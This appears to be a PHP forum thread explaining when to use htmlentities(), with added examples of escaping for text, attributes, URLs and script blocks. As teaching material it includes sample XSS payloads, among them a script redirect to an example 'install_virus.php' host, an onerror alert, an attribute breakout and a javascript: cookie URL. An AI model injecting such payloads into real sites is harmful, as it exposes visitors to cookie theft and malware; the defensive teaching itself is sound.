practical example where to use htmlentities

  • pradeepjain
    Contributor
    • Jul 2007
    • 563

    Hi, I have read about htmlentities. I need to know when exactly it should be used, i.e. some real-world issues if it's not used.
  • Atli
    Recognized Expert
    • Nov 2006
    • 5062

    #2
    Hey.

    The htmlentities function is used to make sure text can be safely printed into HTML. That is, it converts any character that might be read as part of the HTML markup, so that it will be displayed rather than parsed.

    For example, the < and > characters have specific meaning in HTML: they are used as start and end delimiters for HTML tags. If you wanted to print them as part of the text (as the "less-than" and "greater-than" characters) rather than have them parsed as part of the HTML markup, you need to convert them into HTML entities.

    HTML entities are special character sequences that represent characters, so they can be printed into the HTML without messing it up. Like the < and > characters. Their HTML entities look like: "&lt;" and "&gt;".

    The htmlentities() function takes a normal string and converts any character like < and > into their respective HTML entity.
    [code=php]<?php
    // Say I wanted to print this into a navigation bar...
    $navText = "Home > Category > Product";

    // If I print that as it is, I risk messing up the HTML,
    // because > has special meaning in HTML markup.

    // However, if I do this:
    $navText = htmlentities($navText);

    // $navText becomes:
    // - "Home &gt; Category &gt; Product"
    // Which your browser will ignore while parsing the
    // HTML, but will display as:
    // - "Home > Category > Product"
    ?>[/code]

    This is also a very important safety measure, to prevent XSS attacks. Websites that allow the public to add or edit text (like forums and comment sections) are a high-risk target for such attacks.

    Consider if I were to post this as a comment on your site:
    [code=javascript]<script>location.href="http://example.com/install_virus.php";</script>[/code]
    If you printed that as-is into your page, everybody who visited it would be redirected to the URL, which could do anything from flood your visitors with ads, steal their cookies or even abuse browser vulnerabilities to install viruses.

    To protect your visitors from this, you can simply run the post through htmlentities before printing it, turning it into:
    [code=javascript]&lt;script&gt;location.href=&quot;http://example.com/install_virus.php&quot;;&lt;/script&gt;[/code]
    Which the browser will print as the original text, rather than execute it as a part of the client-side code.

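The comment example from the answer above, carried through in PHP as an added example (this is not code from the original post): the vulnerable rendering and the escaped rendering side by side, with the htmlentities() flags spelled out. The function names and the sample comment are constructed for the example; ENT_QUOTES and ENT_SUBSTITUTE are PHP's own constants.

```php
<?php
// Added example, not from the original post: rendering an untrusted comment
// into an HTML page unsafely and then through htmlentities().
declare(strict_types=1);

// Constructed sample of what a visitor might submit as a comment.
const SAMPLE_COMMENT = '<script>location.href="http://example.com/install_virus.php";</script>';

/**
 * Vulnerable: the raw string is concatenated straight into the markup,
 * so the browser parses the <script> element and runs it.
 */
function renderCommentUnsafe(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

/**
 * Escape text for placement between HTML tags. Flags and charset are given
 * explicitly instead of relying on the defaults, which changed in PHP 8.1:
 *   ENT_QUOTES     converts both " and ' (ENT_COMPAT, the old default, left ' alone)
 *   ENT_SUBSTITUTE replaces invalid UTF-8 with U+FFFD instead of returning ""
 *   'UTF-8'        must match the encoding the page is actually served in
 */
function escapeHtml(string $text): string
{
    return htmlentities($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Hardened: the same markup, but the comment is escaped first.
 * For the sample above the escaped text is
 * &lt;script&gt;location.href=&quot;http://example.com/install_virus.php&quot;;&lt;/script&gt;
 */
function renderCommentSafe(string $comment): string
{
    return '<div class="comment">' . escapeHtml($comment) . '</div>';
}

/**
 * Check that no tag delimiter or quote survives in the escaped comment:
 * whatever the browser sees between the <div> tags is now plain text.
 */
function escapedTextIsInert(string $comment): bool
{
    return strpbrk(escapeHtml($comment), '<>"\'') === false;
}

echo "Unsafe markup:\n", renderCommentUnsafe(SAMPLE_COMMENT), "\n\n";
echo "Escaped markup:\n", renderCommentSafe(SAMPLE_COMMENT), "\n\n";
echo escapedTextIsInert(SAMPLE_COMMENT) ? "Escaped text is inert.\n" : "Escaping failed!\n";
```

Run it with `php example.php`. Passing the flags and charset explicitly is the practical point: on PHP older than 8.1 the default was ENT_COMPAT, which leaves single quotes untouched, and a charset that does not match the page lets multi-byte sequences be misread. For plain XSS protection htmlspecialchars() with the same flags is enough, since it converts exactly the characters that matter to the HTML parser.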

    • pradeepjain
      Contributor
      • Jul 2007
      • 563

      #3
      OK, I got the concept well. I use a DB-driven application. Where exactly should htmlentities be used? While printing the data from the DB on the screen, right? Any other specific task where I need to use htmlentities to prevent XSS attacks?


      • Atli
        Recognized Expert
        • Nov 2006
        • 5062

        #4
        It should only be used when printing data to an HTML page. It doesn't really matter where the data is coming from; if it is going to be printed into an HTML page, it should be run through this function (or something equivalent).

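A practitioner's caveat on "printing data to an HTML page", as an added example that is not code from the thread: htmlentities() escapes HTML text and attribute values, and the context around the value decides whether it is the right tool at all. The PHP below walks through four places a database value might land. The function names and attacker strings are constructed for the example; the ENT_* and JSON_* constants are PHP's own, and the note about ENT_COMPAT refers to the default that applied before PHP 8.1.

```php
<?php
// Added example, not from the original thread: the same value needs different
// handling depending on where in the page it is printed. htmlentities() covers
// element content and quoted attributes; it does not cover URLs or JavaScript.
// Every attacker string here is constructed for the example.
declare(strict_types=1);

function escapeHtml(string $text): string
{
    return htmlentities($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 1. Element content: the case the thread covers, and where htmlentities() is enough.
function renderGreeting(string $name): string
{
    return '<p>Hello, ' . escapeHtml($name) . '</p>';
}

// 2. Attribute value. With ENT_COMPAT (the default before PHP 8.1) a single quote
//    is left alone, so a single-quoted attribute can be closed by the data.
function renderTitleWeak(string $title): string
{
    return "<a title='" . htmlentities($title, ENT_COMPAT, 'UTF-8') . "'>link</a>";
}
function renderTitleFixed(string $title): string
{
    // ENT_QUOTES, plus double quotes around the attribute, close both gaps.
    return '<a title="' . escapeHtml($title) . '">link</a>';
}

// 3. URL attribute. Escaping cannot turn a javascript: URL into a harmless one;
//    the scheme has to be checked before the value is used at all.
function safeHref(string $url): string
{
    $scheme = strtolower((string) (parse_url($url, PHP_URL_SCHEME) ?? ''));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '#';               // reject javascript:, data:, and relative/unknown URLs
    }
    return escapeHtml($url);      // then escape it for the attribute it sits in
}

// 4. Inside a <script> element. Entities are not decoded there, so htmlentities()
//    would only corrupt the value, while a raw "</script>" in the data ends the
//    element early. Emit it as a JSON literal with the HTML-significant
//    characters hex-escaped.
function renderScriptVar(string $value): string
{
    $js = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
    return "<script>var userData = $js;</script>";
}

echo renderGreeting('<img src=x onerror=alert(1)>'), "\n";
echo renderTitleWeak("' onmouseover='alert(1)"), "   <- attribute broken out of\n";
echo renderTitleFixed("' onmouseover='alert(1)"), "\n";
echo '<a href="' . safeHref('javascript:alert(document.cookie)') . "\">link</a>\n";
echo '<a href="' . safeHref('https://example.com/page') . "\">link</a>\n";
echo renderScriptVar('</script><script>alert(1)</script>'), "\n";
```

The rule of thumb that follows from the thread still holds: escape at output time, not when storing, because the database copy should stay the original text and the escaping depends on where it is printed. What the example adds is that "where" means the HTML context, not just "some HTML page": text and quoted attributes get htmlentities() (or htmlspecialchars()) with ENT_QUOTES, URL attributes get a scheme check first, and values inside script blocks are emitted with json_encode() and the JSON_HEX_* flags rather than HTML entities.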